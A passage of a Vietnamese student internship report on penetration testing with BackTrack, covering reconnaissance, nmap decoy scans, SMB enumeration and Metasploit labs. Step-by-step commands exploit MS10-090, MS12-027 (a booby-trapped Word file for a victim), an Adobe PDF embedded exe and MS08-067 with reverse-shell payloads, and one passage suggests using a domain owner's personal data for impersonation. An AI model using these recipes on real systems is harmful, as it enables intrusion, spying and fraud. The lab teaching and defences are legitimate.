.................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. .................................................................................................................................................................................................................. TPHCM ngày …. tháng …… năm 20… Giáo viên hướng dẫn
  • 9. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 8 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển GIỚI THIÊU VỀ CÔNG TY THỰC TẬPi Các cơ sở Cơ sở 1: Tại TP Hồ Chí Minh: Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA. Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam. Điện thoại: ( 84-8 ) 3824 4041 Hotline: 0943 23 00 99 Cơ sở 2: Tại TP Hồ Chí Minh: Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA 92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam. Website : www.athena.edu.vn or www.athena.com.vn Điện thoại: ( 84-8 ) 2210 3801 Hotline: 0943 20 00 88 Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước nhà. Lĩnh vực hoạt động  Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI, CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính…  Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…  Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học
  • 10. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 9 Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự,… Đội ngũ giảng viên  Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH, có bằng sư phạm Quốc tế (Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA.  Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA.
  • 11. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 10 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển NỘI DUNG CHÍNH CỦA CHƯƠNG TRÌNH THỰC TẬP PHẦN I: THU THẬP THÔNG TINii Footprinting Cở sở lý thuyết Footprinting là một trong 3 quá trình đầu tiên mà hacker sẽ tiến hành nhằm thu thập thông tin về mục tiêu nhằm xác định:  Hệ thống mạng của mục tiêu: Internet, Localnetwork, Wireless, …  Host: IP, OS, …  Owner: chủ sở hữu, location, nhân viên, … Trong quá trình này hacker chủ yếu sử dụng các phương tiện thông tin công cộng như báo chí, internet để tìm hiểu các thông tin hợp pháp về mục tiêu. Footprinting hầu như không thể phát hiện vì đây là hành động hợp pháp.  Passive Footprinting: o Google Search o Browse Company Website o Whois lookup o Nslookup/Tracert command line  Active Footprinting: o Physical contact o Email contact Cách thực hiện 1. Lấy thông tin cá nhân của người đăng ký webserver tại trang web http://centralops.net/co/ Lấy được các thông tin cá nhân này ta có thể tiến hành các hoạt động mạo danh, lừa đảo chủ webserver để phục vụ cho việc tấn công webserver.
  • 12. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 11 2. Tìm các subdomain hoặc các domain được host tại webserver này để có thể tấn công thông qua các victim này thay vì tấn công trực tiếp. Tiến hành tại website http://www.yougetsignal.com/tools/web-sites-on- web-server/
  • 13. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 12 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển 3. Xác định vị trí của webserver thông qua Google Maps để có thể tiếp cận gần hơn về mặt physical. Nếu như tại hệ thống mạng này có dùng access point ta có thể tấn công vào hệ thống nhờ access point này. Để biết được thông tin về Access Point lận cận như: kiểu mã hóa, MAC Address, … ta có thể dùng lệnh sau tại command promt netsh wlan show networks mode=bssid  BSSID chính là MAC Address của Access Point. Từ MAC Address ta có thể biết được Model của AP, default password, mức độ bảo mật, …  Authentication: ta có thể áp dụng nhiều biện pháp khác để tiến hành crack password AP này. Network Scanning Cơ sở lý thuyết Network Scanning là quá trình tìm hiểu thông tin về các live host trên mạng để giúp hacker quyết định kiểu tấn công nào sẽ được dùng dể tấn công vào hệ thống. Trong quá trình tấn công, hacker sẽ tìm hiểu các thông tin về  Host: nếu ping mục tiêu và nhận được echo reply tức là host chắc chắn tồn tại. Nếu port 139, 445 được mở thì host đang dùng OS Windows Family từ 2000 trở lên.  Network: scan mạng tìm ra các live host làm mục tiêu attack hoặc các NIC hoạt động trong promiscuous mode để nhận diện các hệ thống IDS, hotneypot, …  Vulnerability Scan: tìm ra các lỗi của OS, Services mà host đang sử dụng. Điều kiện scanning: có khả năng kết nối tới mục tiêu Hacker sẽ gửi các gói tin đến mục tiêu và dựa vào các gói tin trả về để phân tích tìm thông tin.
  • 14. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 13 Cách thực hiện Sử dụng công cụ NMAP (http://nmap.org/) để scan cái port, OS và services trên một host Dùng lệnh nmap –sS –O –p 1-445 –D 192.168.222.121 192.168.222.129 Trong đó: o -sS: syn scan o -O: OS detection o -p: scan từ port a-b o -D: giả them IP để tránh log của IDS System Enumeration Cơ sở lý thuyết Enumneration là bước tiếp theo kế tiếp Scanning để xác định các thông tin về host để chuẩn bị cho các bước tiếp theo, Enumeration sẽ thu thập các thông tin về:  Services Port: tìm các port đang mở cho dịch vụ nào  OS: xác định chính xác hệ điều hành nào.  User/Group xác định các thông tin về username, password,… Nền tảng của quá trình này là sử dụng dịch vụ CIFS/Server Message Bkock (SMB) là dịch vụ khởi thủy từ IBM và được phát triển bởi Microsoft. Dịch vụ này nhằm mục đích chia sẻ data trên mạng ngang hang giúp cho các client trong mạng có thể dễ dàng tiếp cận data đã được chia sẻ. Dịch vụ này sử dụng SMB protocol hoạt động ở tầng Application trong mô hình OSI. Từ Windows Vista, Microsoft đã chuyển sang dùng SMB 2.0. Trong quá trình trao đổi SMB theo kiểu client/server sẽ diễn ra quá trình Authentication và xác định các share resource. Mặc định Windows chấp nhận các user anonymouse trong quá trình authentication này để client có thể dễ dàng tìm ra các share source. Connection được tạo ra bữa user anonymouse được gọi là Null Connection. Enumeration sẽ lấy được thông tin vì có thể tạo được Null Connection với mục tiêu. Từ Windows XP, 2003 mặc định user anonymous không nằm trong group everyone Cách thực hiện
  • 15. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 14 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển 1. Tạo null connection với mục tiêu 2. Tìm username của bằng SID2USER Thông tin ta thu về được sau bước này chính là SID của account. Chính con số này sẽ cho ta biết rất nhiều thứ. Dựa vào bảng SID iii để hiểu thông tin mà SID cung cấp. Nhìn vào kết quả thu được bên trên ta nhận thấy rằng cái SID đều giống nhau chỉ khác phần RID, phần số cuối cùng. Và dựa vào bảng này ta có thể tìm được tên của tài khoản Administrator của máy tính. 3. Tìm username của Administrator của máy qua SID2USER Default Global groups (SidTypeGroup) Domain Admins S-1-5-21-<number>-<number>-<number>-512 Domain Users S-1-5-21-<number>-<number>-<number>-513 Domain Guest S-1-5-21-<number>-<number>-<number>-514 Non-Default Global Groups (SidTypeAlias) Example S-1-5-21-<number>-<number>-<number>-n=> 1000 Non-Default Local Groups (SidTypeAlias) Example S-1-5-21-<number>-<number>-<number>-n=> 1000 Default Accounts (SidTypeUser) Administrator S-1-5-21-<number>-<number>-<number>-500 Guest S-1-5-21-<number>-<number>-<number>-501 Non-Default User Accounts (SidTypeUser) jsmith S-1-5-21-<number>-<number>-<number>-n=> 1000 Figure 1: Bảng SID
  • 16. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 15 PHẦN II: SYSTEM HACKING Giới thiệu VMWare Workstation VMWare Workstation là một hyperviser( ảo hóa phần cứng ) chạy trên các máy tính, cho phép người dùng thiết lập một hay nhiều máy ảo trên một máy vật lý và cho phép sử dụng đồng thời với máy thực. Mỗi máy ảo có thể thực thi hệ điều hành của riêng mình, bao gồm các phiên bản Microsoft Windows, Linux, BSD, và MS-DOS. VMWare Workstation được phát triển bởi VMWare, Inc. VMWare Workstation hỗ trợ cầu nối adapter mạng tại máy chủ vật lý và chia sẻ các ỗ đĩa và các thiết bị USB với các máy ảo. Ngoài ra, nó có thể mô phỏng ỗ đĩa. Nó có thể gắn kết một tập tin ảnh ISO vào một ổ đĩa quang ảo để máy ảo thấy nó như là ỗ đĩa thực. Tương tự, ỗ đĩa cứng ảo được thực hiện thông qua các tập tin .vmdk . VMWare Workstation có thể lưu trạng thái của một máy ảo bất cứ lúc nào ngay lập tức. Những trạng thái này có thể được dùng để phục hồi đưa máy ảo về trạng thái đã lưu trước đó. VMWare Workstation có khả năng chỉ nhiều máy ảo chạy trên nó như là tắt, tạm dừng hoặc tiếp tục, tạo điều kiện thích hợp để thử nghiệm môi trường client-server. Hệ điều hành BackTrack5 R3 Giới thiệu Backtrack5 R3 Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập. Trong dạng Live DVD có thể sử dụng trực tiếp từ DVD hoặc có thể cài đặt trên máy và sử dụng như một hệ điều hành. Backtrack hỗ trợ một cách nhanh chóng cho việc tìm kiếm và cập nhật các cơ sở dữ liệu các công cụ bảo mật. Backtrack có lịch sử phát triển qua nhiều phiên bản Linux khác nhau, phiên bản hiện nay đang sử dụng bảng phân phối Slackware Linux và liên tục cập nhật các công cụ, driver qua các phiên bản…Công cụ kiểm thử trong bảo mật có thể được phân loại thành các nhóm như sau:  Information gathering : loại này chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ e-mail. Thông tin này được thu thập từ các thông tin có sẵn trên Internet mà không cần chạm vào mục tiêu.  Network mapping : loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning.  Vulnerability identification : Trong thể loại này bạn có thể tìm thấy các công cụ quét lỗ hổng tổng hợp và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).  Web application analysis : loại này chứa công cụ có thể được sử dụng để theo dõi, giám sát các hoạt động web.  Radio network analysis : Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), bạn có thể sử dụng các công cụ trong thể loại này.  Penetration : loại này chứa công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu.  Privilege escalation : Sau khi khai thác được các lỗ hổng và truy cập vào được các máy tính mục tiêu, bạn có thể sử dụng các công cụ loại này để nâng cao đặc quyền của bạn cho các đặc quyền cao nhất.  Maintaining access : Công cụ loại này sẽ có thể sẽ giúp bạn trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Bạn có thể cần những đặc quyền cao nhất trước khi bạn có thể cài đặt công cụ để duy trì quyền truy cập.  Voice Over IP (VOIP) : Các công cụ để phân tích VOIP.  Digital forensics : Phân tích hình ảnh đĩa cứng cấu trúc các tập tin có thể chọn Start Backtrack Forensics trong trình đơn khởi động.  Reverse engineering : Gỡ rối chương trình hoặc tháo rời các tập tin thực thi.
  • 17. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 16 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển Cài đặt Backtrack5 R3 trên VMWare Tại giao diện chính của VMWare Workstation chọn File -> New Virtual Machine Ta chọn Next để qua bước kế tiếp Tiếp theo ta sẽ chọn phiên bản của hệ điều hành và đặt tên cho máy Backtrack. Ở đây tôi đặt tên máy là Backtrack5 R3
  • 18. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 17 Nhấn Next để qua bước kế tiếp, trong phần disk size ta sẽ chọn 20 GB. Tiếp theo ta chọn Next -> Finish.
  • 19. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 18 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển Đầu tiên ta sẽ dẫn file .ISO cài đặt Backtrack5 R3 Tiếp theo ta bấm Power on this virtual machine để khởi động quá trình cài đặt. Và đợi quá trình cài đặt hoàn tất. Để vào Desktop của Backtrack ta dùng lệnh : startx
  • 20. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 19 Để hoàn tất cài đặt Backtrack5 R3 ta nhấn : Install BackTrack trên màn hình Desktop Tiếp theo ta sẽ thiết lập một số options để quá trình cài đặt được bắt đầu.
  • 21. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 20 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
  • 22. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 21 Quá trình cài đặt sẽ mất một khoảng thời gian. Đến đây thì quá trình cài đặt đã kết thúc, chúng ta bấm Restart Now để khởi động lại máy. Chúng ta đăng nhập với tên là root, password là toor. Gõ startx để vào Desktop của Backtrack.
  • 23. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 22 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển Công cụ Metasploit Giới thiệu Metasploit Metasploit Framework là môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành Windows, Linux, MacOS. Các thành phần của Metasploit  Cosole interface : dùng msfconsole.bat . Msfconsole interface sử dụng được các dòng lệnh cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn.  Web interface : dùng msfweb.bat giao tiếp với người dùng thông qua giao diện web.  Command line interface : dùng msfcli.bat .  Môi trường :  Global Enviroment : được thực thi thông qua 2 câu lệnh setg và unsetg, những options này được gán ở đây sẽ mang tính toàn cục, được đưa tất cả vào trong module exploits.  Temporary Enviroment : được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploits hiện tại và không ảnh hưởng đến các modul exploits khác.  Chúng ta có thể lưu lại enviroment đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu lại trong /.msfconfig và sẽ được load trở lại khi user interface được thực hiện.  Những options nào chung giữa giư các exploits module : LPORT, LHOST, PAYLOAD thì chúng ta sẽ xác định ở Global Enviroment. Sử dụng Metasploit framework 1. Chọn module exploit : lựa chọn chương trình, lỗi mà Metasploit có hỗ trợ để khai thác.  Show exploits : xem các module mà exploit mà framework hỗ trợ.  Use exploit_name : chọn exploit name.  Info exploit_name : xem thông tin về module exploit. 2. Cấu hình module exploit đã chọn.  Show options : xác định những options nòa cần cấu hình.  Set : cấu hình cho những options của những module đó. 3. Verify những options vừa cấu hình.  Check : kiểm tra những options đã được cấu hình chính xác chưa.
  • 24. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 23 4. Lựa chọn target : lựa chọn hệ điều hành nào để tiến hành.  Show target : những target được cung cấp bởi module đó.  Set : xác định target nào. 5. Lựa chọn payload  Payload là đoạn mã code sẽ chạy trên hệ thống remote machine.  Show payloads : liệt kê ra những payload của module exploit hiện tại.  Info payload_name : xem thông tin chi tiết về payload đó.  Set payload payload_name : xác định tên của payload module. Sau khi chọn payload nào ta dùng lệnh show options để xem options của payload đó.  Show advanced : xem những advanced options của payload. 6. Thực thi exploit  Exploit : lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho bạn những thông tin cần thiết. Payload meterpreter Meterpreter là viết tắt của meta-Interpreter là một advanced payload có trong Metasploit framework. Mục đích của nó là để cung cấp những tập lệnh để khai thác tấn công các remote computer. Nó được viết từ các developer dưới dạng shared project (.DLL) files. Meterpeter và các thành phần mở rộng được inject vào trong bộ nhớ RAM, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus. Tập lệnh trong meterpreter: help: Hiển thị menu giúp đỡ. Background: đưa về msf promt và meterpreter được chạy nền. cat: Hiển thị nội dung của một file. cd & pwd: chuyển đổi các thư mục hiện hành tại máy victim. clearev: xóa toàn bộ log của Application, System and Security trên hệ điều hành Windows. download: tiến hành download một file từ victim về máy. Sử dụng “” khi thao tác với các đường dẫn. edit: edit một file ở máy victim. Sử dụng trình soạn thảo vim để edit. execute: chạy một lệnh trên máy victim. getuid hiển thị thong tin user hiện tại meterpreter đang làm việc trên máy victim hashdump xem nội dung của SAM database idletime hiển thị thời gian mà người dung ở máy victim đã không hoạt động. ipconfig hiển thị các interface và các địa chỉ IP ở máy victim lpwd & lcd thay đổi thư mục hiện hành tại máy local ls hiển thị danh sách các file trong thư mục hiện hành ở máy victim. migrate đính meterpreter vào một process khác đang hoạt động ở máy victim ps hiển thị các process đang hoạt động ở máy victim resource chạy các lệnh meterpreter được định nghĩa trong một text file search tìm kiếm file trên máy victim shell tiến hành thao tác với shell của máy victim upload upload một file từ local lên máy vicim. Sử dụng “” khi thao tác với các đường dẫn trên. webcam_list hiển thị danh sách các webcam có thể sử dụng ở máy victim webcam_snap chụp ảnh bằng webcam ở máy victim. Ở đề tài nhóm chủ yếu tập trung vào khai thác bằng payload này.
  • 25. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 24 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển Tiến hành khai thác các lỗ hổng trên Windows XP qua localhost Kết quả cuối cùng của việc khai thác các lỗ hổng này là tạo được một session với máy victim và đính payload meterpreter vào máy victim để chiếm quyền điều khiển và có thể tiến hành cài backdoor vào máy nạn nhân. Khai thác lỗi MS10-090: lỗi của MSHTML trong trình duyệt IE6, IE7 Targets: Internet Explorer 6 hoặc 7 Chuẩn bị môi trường: Máy backtrack và máy victim có cài đặt IE6 hoặc IE7 Ta kiểm tra IP trên máy Backtrack bằng lệnh : ifconfig Ta được IP của Backtrack : 192.168.24.128 Khởi động Metasploit của Backtrack bằng lệnh : msfconsole Tìm kiếm mã lỗi trên Metasploit bằng lệnh : search ms10_090
  • 26. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 25 Sau khi search được mã lỗi ta dùng lệnh : use windows/brower/ms10_090_ie_css_clip Dùng lệnh show options để thể hiện các thuộc tính cần thiết của mã lỗi. Sau khi biết các thuộc tính cần thêm vào, ta thiết lập các thuộc tính sau : set SRVHOST 192.168.24.128 set payload windows/meterpreter/reverse_tcp set LHOST 192.168.24.128 set uripath /hack
  • 27. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 26 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển Dùng lệnh exploit để tiến hành khai thác lỗi. Backtrack sẽ tạo ra một link http://192.168.24.128:8080/hack khi máy XP truy cập vào địa chỉ này sẽ tạo một session đến máy backtrack. Quay lại máy XP, mở trình duyệt IE và truy cập vào địa chỉ http://192.168.24.128:8080/hack
  • 28. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 27 Trên máy Backtrack bắt đầu có sự kết nối tới XP. Chúng ta đợi đến khi có địa chỉ kết nối vào ta sẽ tạo phiên kết nối. Dùng lệnh sessions để kiểm tra. Dùng lệnh sessions –i 1 để kết nối vao sessions 1.
  • 29. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 28 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển Đến bước này meterpreter đã được inject vào trong máy của victim và ta có thể sử dụng các lệnh meterpreter thao tác lên máy victim. Cách phòng tránh:  Không vào các đường link lạ, không rõ nguồn gốc.  Sử dụng phiên bản mới nhất của Internet Explorer hoặc sử dụng các trình duyệt khác như Chrome, Firefox, … Khai thác lỗi MS12_027: lổ hổng MS-Office 2007, 2010 Targets: Microsoft Office 2007, 2010 Chuẩn bị môi trường: Máy backtrack và máy victim Windows XP hoặc Windows 7 có cài đặt Microsoft Office 2007 hoặc 2010 Ta kiểm tra IP trên máy Backtrack bằng lệnh : ifconfig Ta được IP của Backtrack : 192.168.24.128 Khởi động Metasploit và sử dụng lệnh để load mã lỗi use exploit/windows/fileformat/ms12_027_mscomclt_bof
  • 30. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 29 Dùng lệnh: show options để xem cái option của mã lỗi Thiết lập file mang mã độc dùng lệnh : set FILENAME report.doc Thiết lập PAYLOAD set payload windows/meterpreter/reverse_tcp set LHOST 192.168.24.138 set LPORT 4443 Cuối cùng ta dùng lệnh exploit để tạo file word đã được đính mã độc. Sau khi có được file word này ta sẽ gửi cho nạn nhân và tiến hành lắng nghe kết nối tại máy backtrack. Để bắt đầu lắng nghe kết nối ta dùng các lệnh sau: use exploit/multi/handler set LPORT 4443 /* Port này giống với port lúc tạo file mã độc */ exploit Sau bước này, bất cứ khi nào victim mở file Word chứa mã độc thì ta sẽ có được một session với máy victim tiếp theo ta sẽ làm việc với meterpreter để chiếm quyền điều khiển máy victim. Cách phòng tránh  Không xem những tài liệu được gửi đến từ người lạ, có nguồn gốc không rõ.  Cập nhập bản vá lỗi cho MS-Word hoặc sử dụng phiên bản mới nhất của Microsoft Word (2013) hoặc một phần mềm soạn thảo văn bản khác như Open Office. Khai thác lỗi của Adobe Reader Targets: Máy Adobe Reader v8.x, v9.x
  • 31. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 30 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển Môi trường chuẩn bị: Máy backtrack và máy victim sử dụng Windows XP SP3 có cài đặt và dử dụng Adobe Reader v8.x hoặc v9.x Khởi động Metasploit của Backtrack bằng lệnh : msfconsole Dùng lệnh use exploit/windows/fileformat/adobe_pdf_embedded_exe Dùng lệnh show options để thể hiện các thuộc tính mã lỗi
  • 32. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 31 Tiếp theo ta set INFIENAME: set INFIENAME /home/target.pdf /* Đây là file PDF bình thường không chứa mã độc */ set FILENAME evil.pdf /* Đây là file PDF bình thường đã được đính kèm mã độc và sẽ được gửi đi cho victim */ exploit Sau khi exploit file PDF nhận được, là file PDF bình thường đã được đính mã độc vào. Tiếp theo ta tiến hành lắng nghe kết nối từ victim. use exploit/multi/handler set lport 4443 exploit
  • 33. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 32 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển Cách phòng tránh Lỗi này có thể dễ dành nhận biết được khi tiến hành mở file PDF. Tại khung File, nếu để ý kỹ phần phía trên đoạn text này sẽ chứa một đoạn mã rất dài và được cover lại bằng một đoạn text trống để nạn nhân khó nhận biết được. Để ngăn chặn việc tấn công ta chỉ cần ấn Do Not Open là sẽ chặn được việc khai thác này. Đây thực chất không phải là lỗ hổng hay lỗi của phần mềm mà đây là một chức năng của Adobe Reader, nhưng chức năng này đã bị hacker lợi dụng cho mục đích xấu. Nên người dùng cần phải hết sức thận trọng. Khai thác mã lỗi MS08_067: lỗ hổng của hệ điều hành Windows XP Targets: Windows XP tất cả các Service Pack Môi trường chuẩn bị: Máy backtrack và máy victim sử dụng Windows XP Tiến hành khai thác: use exploit/windows/smb/ms08_067_netapi
  • 34. TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA Chương trình thực tập công nghiệp 2 Trang 33 Dùng lệnh show options để hiển thị các thông số cần cài đặt và tiến hành cài đặt các thông số này. set RHOST 192.168.174.130 Cài đặt PAYLOAD với các thông số và tiến hành khai thác. set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.174.128 exploit Cách phòng tránh: Đây là một lỗi rất nguy hiểm vì khi bị hacker tấn công, ở máy nạn nhân không hề có bất kỳ dấu hiệu nào đáng ngờ. Vì thế cần thiết phải update bản vá lỗi cho Windows XP để tránh khỏi việc bị tấn công. Thông tin chi tiết về mã lỗi xem tại https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
  • 35. GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng Trang 34 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển Tấn công qua mạng Internet, triển khai trên VPS VPS là gì Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều. Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị hack local. Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường. VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,…. Đặc điểm VPS Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng. Tiết kiệm được nhiều chi phí so với việc thuê một server riêng. Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao… Trong trường hợp VPS bị thiếu tài nguyên thì có thể 